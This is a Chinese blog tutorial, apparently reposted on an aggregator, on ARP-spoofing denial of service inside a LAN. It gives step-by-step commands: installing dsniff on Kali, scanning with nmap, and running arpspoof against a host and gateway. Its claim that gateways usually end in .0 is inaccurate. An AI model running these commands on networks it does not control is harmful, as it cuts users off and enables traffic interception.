局域网内的ARP断网攻击
生活随笔
收集整理的這篇文章主要介紹了
局域网内的ARP断网攻击
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
一、環(huán)境準(zhǔn)備:
- Kali虛擬機(jī)
- linux內(nèi)核版本:5.16.0-kali5-amd64 (這只是說明下我的內(nèi)核版本,其實(shí)只要版本不要太老,基本都能用)
- 在虛擬機(jī)設(shè)置的網(wǎng)絡(luò)適配器里選擇橋接模式
二、配置和安裝相關(guān)第三方工具
1.配置源,kali默認(rèn)的源在安裝dsniff的時(shí)候會(huì)提示找不到包。
1. sudo vim /etc/apt/sources.list 2. 把之前kali默認(rèn)的源也就是以deb開頭的那兩行注釋掉 (在開頭的第一個(gè)字母前端加#表示注釋一行) 3. 將要添加的鏡像加入剛剛打開的文件中,再輸入:wq即可,常用鏡像地址如下所示,選用一個(gè)就好,添加多個(gè)源容易發(fā)生沖突,我用的是阿里的源:#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#清華大學(xué)deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-freedeb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free#浙大deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-freedeb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free#東軟大學(xué)#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib#deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib#官方源deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contrib4. 更新源對(duì)應(yīng)的安裝環(huán)境和安裝包等配置apt-get clean && apt-get update && apt-get upgrade && apt-get dist-upgrade5.輸入reboot重啟虛擬機(jī)(非必須,但為保證配置生效,最好重啟一遍)2.安裝第三方工具包dsniff
sudo apt-get install dsniff3.測試dsniff是否安裝成功
sudo arpspoof -hsudo dnsspoof -hsudo dsniff -h安裝成功結(jié)果如下所示 :
?三、開始ARP攻擊
1.查看ip地址和網(wǎng)關(guān)地址(通常網(wǎng)關(guān)都是xxx.xxx.xxx.0,我這里的圖是因?yàn)槲锢碇鳈C(jī)連的手機(jī)的wifi導(dǎo)致網(wǎng)關(guān)和正常局域網(wǎng)網(wǎng)關(guān)不太一樣)
ifconfigroute -n2.使用nmap探測局域網(wǎng)存活主機(jī)
#后面的ip是局域網(wǎng)網(wǎng)關(guān)地址 nmap -sP 192.168.243.0/24?3.攻擊物理主機(jī)(友情提示,不要攻擊正在打游戲的室友的主機(jī),室友已經(jīng)被游戲折磨的夠慘了,就不要再搞得他慘上加慘了)
sudo arpspoof -i eth0 -t 192.168.243.193 192.168.243.0 -i:網(wǎng)卡名稱 -t:目標(biāo)主機(jī)IP 目標(biāo)網(wǎng)關(guān)IP?4.檢測目標(biāo)主機(jī)能否正常聯(lián)網(wǎng)
5.ctrl+z停止攻擊,再次檢測能否聯(lián)網(wǎng)
四、疑惑
? ? ? ? 在實(shí)際測試的時(shí)候經(jīng)常會(huì)有部分主機(jī)nmap無法掃描到,在物理主機(jī)上用Zenmap也不行,不知道是什么情況,以后有時(shí)間再慢慢研究吧。
?
總結(jié)
以上是生活随笔為你收集整理的局域网内的ARP断网攻击的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BZOJ3698]XWW的难题(有源汇
- 下一篇: 北京PM2.5浓度回归分析